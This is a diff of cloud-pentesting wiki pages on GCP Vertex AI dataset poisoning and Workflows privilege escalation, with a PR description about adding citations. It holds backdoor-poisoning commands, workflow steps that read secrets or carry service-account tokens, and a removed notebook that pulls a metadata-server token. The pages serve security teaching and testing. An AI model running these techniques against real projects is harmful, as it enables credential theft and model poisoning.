+**Note**: The current `gcloud ai` command group does not expose dataset commands, so use the REST API or a supported client library. The import request supplies a Cloud Storage source and a schema URI that must match the dataset objective. <sup>[[17]](#references)[[20]](#references)</sup>
 
-By importing crafted data into a dataset used for training ML models, an attacker can:
+By importing crafted data into a dataset used for training ML models, an attacker may:
 - Introduce backdoors into models (trigger-based misclassification)
 - Poison training data to degrade model performance
-- Inject data to cause models to leak information
+- Inject data that may cause models to leak information
 - Manipulate model behavior for specific inputs
 
 This attack is particularly effective when targeting datasets used for:
 - Image classification (inject mislabeled images)
 - Text classification (inject biased or malicious text)
 - Object detection (manipulate bounding boxes)
-- Recommendation systems (inject fake preferences)
+- Other supported objectives, using the objective-specific import schema
 
 <details>
 
@@ -607,7 +607,7 @@ curl -s -X GET \
 # Upload backdoor trigger images labeled as the target class
 echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
 gsutil cp backdoor.jsonl gs://your-bucket/attacks/
-# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
+# Import into the dataset; a future training run may learn to classify the trigger pattern as "authorized_user"
 ```
 
 </details>
@@ -630,12 +630,12 @@ done > label_flip.jsonl
 
 <details>
 
-<summary>Data poisoning for model extraction</summary>
+<summary>Boundary-case poisoning</summary>
 
 ```bash
-# Scenario 3: Data Poisoning for Model Extraction
-# Inject carefully crafted queries to extract model behavior
-# Useful for model stealing attacks
+# Scenario 3: Boundary-case poisoning
+# Add carefully chosen boundary examples to test how a future training run
+# handles ambiguous inputs; this import does not itself extract model outputs.
 cat > extraction_queries.jsonl <<'EOF'
 {"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
 {"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
@@ -672,88 +672,39 @@ EOF
 - Backdoored models that misclassify on specific triggers
 - Degraded model performance and accuracy
 - Biased models that discriminate against certain inputs
-- Information leakage through model behavior
-- Long-term persistence (models trained on poisoned data will inherit the backdoor)
+- Possible information leakage through model behavior
+- Long-term persistence (models trained on poisoned data may inherit the backdoor)
 
 
 ### `aiplatform.notebookExecutionJobs.create`, `iam.serviceAccounts.actAs`
 
-> [!WARNING]
-> > [!NOTE]
-> **Deprecated API**: The `aiplatform.notebookExecutionJobs.create` API is deprecated as part of Vertex AI Workbench Managed Notebooks deprecation. The modern approach is using **Vertex AI Workbench Executor** which runs notebooks through `aiplatform.customJobs.create` (already documented above).
-> The Vertex AI Workbench Executor allows scheduling notebook runs that execute on Vertex AI custom training infrastructure with a specified service account. This is essentially a convenience wrapper around `customJobs.create`.
-> **For privilege escalation via notebooks**: Use the `aiplatform.customJobs.create` method documented above, which is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.
+The historical managed and user-managed Vertex AI Workbench notebook offerings are no longer a current escalation path: managed notebook creation was removed on April 14, 2025 and existing managed instances were deleted on March 30, 2026; user-managed notebook creation was also removed and existing instances were converted to standalone Compute Engine VMs. <sup>[[18]](#references)</sup>
 
-**The following technique is provided for historical context only and is not recommended for use in new assessments.**
-
-Create **notebook execution jobs** that run Jupyter notebooks with arbitrary code.
-
-Notebook jobs are ideal for interactive-style code execution with a service account, as they support Python code cells and shell commands.
-
-<details>
-
-<summary>Create malicious notebook file</summary>
-
-```bash
-# Create a malicious notebook
-cat > malicious.ipynb <<'EOF'
-{
-  "cells": [
-    {
-      "cell_type": "code",
-      "source": [
-        "import subprocess\n",
-        "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
-        "print(token.decode())"
-      ]
-    }
-  ],
-  "metadata": {},
-  "nbformat": 4
-}
-EOF
-
-# Upload to GCS
-gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
-```
-
-</details>
-
-<details>
-
-<summary>Execute notebook with target service account</summary>
-
-```bash
-# Create notebook execution job using REST API
-PROJECT="gcp-labs-3uis1xlx"
-REGION="us-central1"
-TARGET_SA="491162948837-compute@developer.gserviceaccount.com"
-
-
-curl -X POST \
-  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
-  -H "Content-Type: application/json" \
-  https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-  -d '{
-    "displayName": "data-analysis-job",
-    "gcsNotebookSource": {
-      "uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
-    },
-    "gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
-    "serviceAccount": "'${TARGET_SA}'",
-    "executionTimeout": "3600s"
-  }'
-
-# Monitor job for token in output
-# Notebooks execute with the specified service account's permissions
-```
-
-</details>
+Current Workbench notebook execution runs notebook code on Vertex AI custom training. For a live assessment, evaluate the `aiplatform.customJobs.create` and `iam.serviceAccounts.actAs` path above, then verify the executor's service account and the permissions of any input and output buckets instead of replaying the obsolete notebook-execution REST recipe. <sup>[[8]](#references)[[19]](#references)</sup>
 
 
 ## References
 
-- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
-- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)
+- [1] [Vertex AI documentation](https://cloud.google.com/vertex-ai/docs)
+- [2] [Vertex AI REST reference](https://cloud.google.com/vertex-ai/docs/reference/rest)
+- [3] [Set up the Agent Runtime environment](https://docs.cloud.google.com/gemini-enterprise-agent-platform/build/runtime/setup?hl=en)
+- [4] [Troubleshoot deploying an agent](https://docs.cloud.google.com/gemini-enterprise-agent-platform/troubleshooting/agent-deployment?hl=en)
+- [5] [Double Agents: Exposing Security Blind Spots in GCP Vertex AI](https://unit42.paloaltonetworks.com/double-agents-vertex-ai/)
+- [6] [Gemini Enterprise Agent Platform roles and permissions](https://docs.cloud.google.com/iam/docs/roles-permissions/aiplatform)
+- [7] [Service account impersonation](https://docs.cloud.google.com/iam/docs/service-accounts-actas)
+- [8] [Use a custom service account](https://docs.cloud.google.com/vertex-ai/docs/general/custom-service-account)
+- [9] [Query metadata server](https://docs.cloud.google.com/compute/docs/metadata/querying-metadata)
+- [10] [gcloud ai custom-jobs create](https://docs.cloud.google.com/sdk/gcloud/reference/ai/custom-jobs/create)
+- [11] [gcloud ai models upload](https://docs.cloud.google.com/sdk/gcloud/reference/ai/models/upload)
+- [12] [pickle — Python object serialization](https://docs.python.org/3/library/pickle.html)
+- [13] [Introduction to Vertex AI Pipelines](https://docs.cloud.google.com/vertex-ai/docs/pipelines/introduction)
+- [14] [gcloud ai hp-tuning-jobs create](https://docs.cloud.google.com/sdk/gcloud/reference/ai/hp-tuning-jobs/create)
+- [15] [Vertex AI RPC API](https://docs.cloud.google.com/vertex-ai/docs/reference/rpc/google.cloud.aiplatform.v1)
+- [16] [Export metadata and annotations from a dataset](https://docs.cloud.google.com/vertex-ai/docs/datasets/export-metadata-annotations)
+- [17] [Method: datasets.import](https://docs.cloud.google.com/gemini-enterprise-agent-platform/reference/rest/v1/projects.locations.datasets/import)
+- [18] [Vertex AI deprecations](https://cloud.google.com/vertex-ai/docs/deprecations)
+- [19] [Introduction to Vertex AI Workbench](https://cloud.google.com/vertex-ai/docs/workbench/introduction)
+- [20] [gcloud ai](https://docs.cloud.google.com/sdk/gcloud/reference/ai)
+- [21] [Prebuilt containers for inference and explanation](https://docs.cloud.google.com/gemini-enterprise-agent-platform/machine-learning/predictions/pre-built-containers)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md
@@ -1,7 +1,5 @@
 # GCP - Workflows Privesc
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## Workflows
 
 Basic Information:
@@ -10,13 +8,15 @@ Basic Information:
 ../gcp-services/gcp-workflows-enum.md
 {{#endref}}
 
-### `workflows.workflows.create`, `iam.serviceAccounts.ActAs`, `workflows.executions.create`, (`workflows.workflows.get`, `workflows.operations.get`)
+### `workflows.workflows.create`, `iam.serviceAccounts.actAs`, `workflows.executions.create`, (`workflows.workflows.get`, `workflows.executions.get`, `workflows.operations.get`)
 
-Afaik it's not possible to get a shell with access to the metadata endpoint containing the SA credentials of the SA attacked to a Workflow. However, it's possible to abuse the permissions of the SA by adding the actions to perform inside the Workflow.
+Workflows runs connector and HTTP steps using the service account associated with the workflow. A principal that can create a workflow, attach a service account, and start an execution can therefore define steps that act with that service account's permissions. Attaching the account requires `iam.serviceAccounts.actAs`; starting an execution requires `workflows.executions.create`; and reading workflow or execution details uses separate read permissions. <sup>[[1]](#references)[[2]](#references)[[4]](#references)[[6]](#references)</sup>
 
-It's possible to find the documentation of the connectors. For example, this is the [**page of the Secretmanager connector**](https://cloud.google.com/workflows/docs/reference/googleapis/secretmanager/Overview)**.** In the side bar it's possible to find several other connectors.
+Privilege escalation does not require a shell: define connector or authenticated HTTP steps in the workflow, and those steps run as the attached service account. The service account still needs the permissions required by each target resource, whether the workflow uses a connector or an authenticated HTTP request. <sup>[[1]](#references)[[2]](#references)</sup>
 
-And here you can find an example of a connector that prints a secret:
+### Access secrets with a connector
+
+Workflows connectors provide methods for Google Cloud APIs. The [Secret Manager API connector reference](https://cloud.google.com/workflows/docs/reference/googleapis/secretmanager/Overview) documents the Secret Manager connector's `accessString` helper, which returns a secret version as a string; the attached service account must have `roles/secretmanager.secretAccessor` on the secret, project, folder, or organization. <sup>[[2]](#references)[[3]](#references)[[9]](#references)</sup>
 
 <details><summary>Workflow YAML configuration to access secrets</summary>
 
@@ -37,86 +37,97 @@ main:
 
 </details>
 
-Update from the CLI:
+### Deploy and execute a workflow from the CLI
+
+Deploy a workflow and associate it with the service account whose permissions the workflow will use. The deployer needs permission to create or update the workflow and to attach the selected service account. <sup>[[1]](#references)[[6]](#references)[[8]](#references)</sup>
 
 <details><summary>Deploy and execute workflows from CLI</summary>
 
 ```bash
-gcloud workflows deploy <workflow-name> \
-    --service-account=email@SA \
-    --source=/path/to/config.yaml \
-    --location us-central1
+gcloud workflows deploy <workflow-name> --service-account=<service-account-email> --source=/path/to/config.yaml --location=us-central1
 ```
 
-If you get an error like `ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist`, just **wait a minute and try again**.
-
-If you don't have web access it's possible to trigger and see the execution of a Workflow with:
+To trigger the workflow and inspect its result:
 
 ```bash
-# Run execution with output
-gcloud workflows run <workflow-name> --location us-central1
+# Run execution and wait for its result
+gcloud workflows run <workflow-name> --location=us-central1
 
-# Run execution without output
-gcloud workflows execute <workflow-name> --location us-central1
+# Start execution without waiting for completion
+gcloud workflows execute <workflow-name> --location=us-central1
 
 # List executions
-gcloud workflows executions list <workflow-name>
+gcloud workflows executions list <workflow-name> --location=us-central1
 
-# Get execution info and output
-gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>
+# Get execution state, output, or errors
+gcloud workflows executions describe <execution-id> --workflow=<workflow-name> --location=us-central1
 ```
 
 </details>
 
-> [!CAUTION]
-> You can also check the output of previous executions to look for sensitive information
-
-Note that even if you get an error like `PERMISSION_DENIED: Permission 'workflows.operations.get' denied on...` because you don't have that permission, the workflow has been generated.
-
-### Leak OIDC token (and OAuth?)
-
-According [**to the docs**](https://cloud.google.com/workflows/docs/authenticate-from-workflow) it's possible to use workflow steps that will send an HTTP request with the OAuth or OIDC token. However, just like in the case of [Cloud Scheduler](gcp-cloudscheduler-privesc.md), the HTTP request with the Oauth token must be to the host `.googleapis.com`.
+`gcloud workflows run` waits for the execution to complete, while `gcloud workflows execute` returns an execution ID without waiting. Listing and describing executions exposes their state, output, and errors; reading those details requires the corresponding workflow and execution permissions. <sup>[[4]](#references)[[5]](#references)[[6]](#references)[[8]](#references)</sup>
 
 > [!CAUTION]
-> Therefore, it's **possible to leak the OIDC token by indicating a HTTP endpoint** controlled by the user but to leak the **OAuth** token you would **need a bypass** for that protection. However, you are still able to **contact any GCP api to perform actions on behalf the SA** using either connectors or HTTP requests with the OAuth token.
+> Execution results can contain workflow output, input, and error details, so previous executions may expose sensitive information. <sup>[[5]](#references)</sup>
 
-#### Oauth
+The IAM reference lists `workflows.operations.get` separately from `workflows.workflows.get` and `workflows.executions.get`; operation access does not replace the execution permission needed to read workflow output. <sup>[[5]](#references)[[6]](#references)</sup>
+
+### Send OIDC or OAuth 2.0 tokens from HTTP steps
+
+An authenticated HTTP step uses the workflow's attached service account. For Google Cloud APIs, Workflows can use OAuth 2.0, while Cloud Run and Cloud Run functions use OIDC; connectors are preferred when a suitable Google Cloud connector exists. <sup>[[2]](#references)[[7]](#references)</sup>
+
+OAuth 2.0 authentication is restricted to HTTPS endpoints whose hostname ends in `.googleapis.com`, so an OAuth token cannot be sent directly to an arbitrary endpoint through this method, as in the analogous [Cloud Scheduler](gcp-cloudscheduler-privesc.md) flow. OIDC requests are restricted to HTTPS and can target a Cloud Run or Cloud Run functions endpoint; if that endpoint is controlled by the tester, it can receive the workflow service account's OIDC bearer token. <sup>[[7]](#references)</sup>
+
+#### OAuth 2.0
 
 <details><summary>Workflow HTTP request with OAuth token</summary>
 
 ```yaml
     - step_A:
-      call: http.post
-      args:
+        call: http.post
+        args:
           url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
           auth:
-              type: OAuth2
-              scopes: OAUTH_SCOPE
+            type: OAuth2
+            scopes: OAUTH_SCOPE
 ```
 
-</details>#### OIDC
+</details>
+
+#### OIDC
 
 <details><summary>Workflow HTTP request with OIDC token</summary>
 
 ```yaml
     - step_A:
-      call: http.get
-      args:
+        call: http.get
+        args:
           url: https://us-central1-project.cloudfunctions.net/functionA
           query:
-              firstNumber: 4
-              secondNumber: 6
-              operation: sum
+            firstNumber: 4
+            secondNumber: 6
+            operation: sum
           auth:
-              type: OIDC
-              audience: OIDC_AUDIENCE
+            type: OIDC
+            audience: OIDC_AUDIENCE
 ```
 
-</details>### `workflows.workflows.update` ...
+</details>
 
-With this permission instead of `workflows.workflows.create` it's possible to update an already existing workflow and perform the same attacks.
+### `workflows.workflows.update`
+
+Updating an existing workflow can replace its definition with connector or HTTP steps and produce the same impact when the updated workflow can be executed. If the update also changes the attached service account, the updater additionally needs permission to attach that account. <sup>[[1]](#references)[[4]](#references)[[6]](#references)</sup>
+
+## References
+
+- [1] [Grant a workflow permission to access Google Cloud resources](https://cloud.google.com/workflows/docs/authentication)
+- [2] [Understand connectors](https://cloud.google.com/workflows/docs/connectors)
+- [3] [Secure and store sensitive data using the Secret Manager connector](https://cloud.google.com/workflows/docs/use-secret-manager)
+- [4] [Execute a workflow](https://cloud.google.com/workflows/docs/executing-workflow)
+- [5] [Access workflow execution results](https://cloud.google.com/workflows/docs/access-execution-results)
+- [6] [Workflows roles and permissions](https://cloud.google.com/iam/docs/roles-permissions/workflows)
+- [7] [Make authenticated requests from a workflow](https://cloud.google.com/workflows/docs/authenticate-from-workflow)
+- [8] [Create a workflow by using the gcloud CLI](https://cloud.google.com/workflows/docs/create-workflow-gcloud)
+- [9] [Secret Manager API Connector Overview](https://cloud.google.com/workflows/docs/reference/googleapis/secretmanager/Overview)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-


### PR DESCRIPTION
## Summary

- audits SUMMARY.md positions 101-150 (49 pages changed; one page already compliant)
- numbers and cites used references while preserving existing reference order
- keeps the training banner as the final nonblank line after References
- removes duplicated prose and contains no hackingthe.cloud references

## Validation

- root review of every changed page
- citation/reference/banner structural validator: 49 files, 0 errors
- duplicate prose/code scan: 0 findings
- git diff --check
- mdbook build unavailable locally because the required mdbook-tabs preprocessor is not installed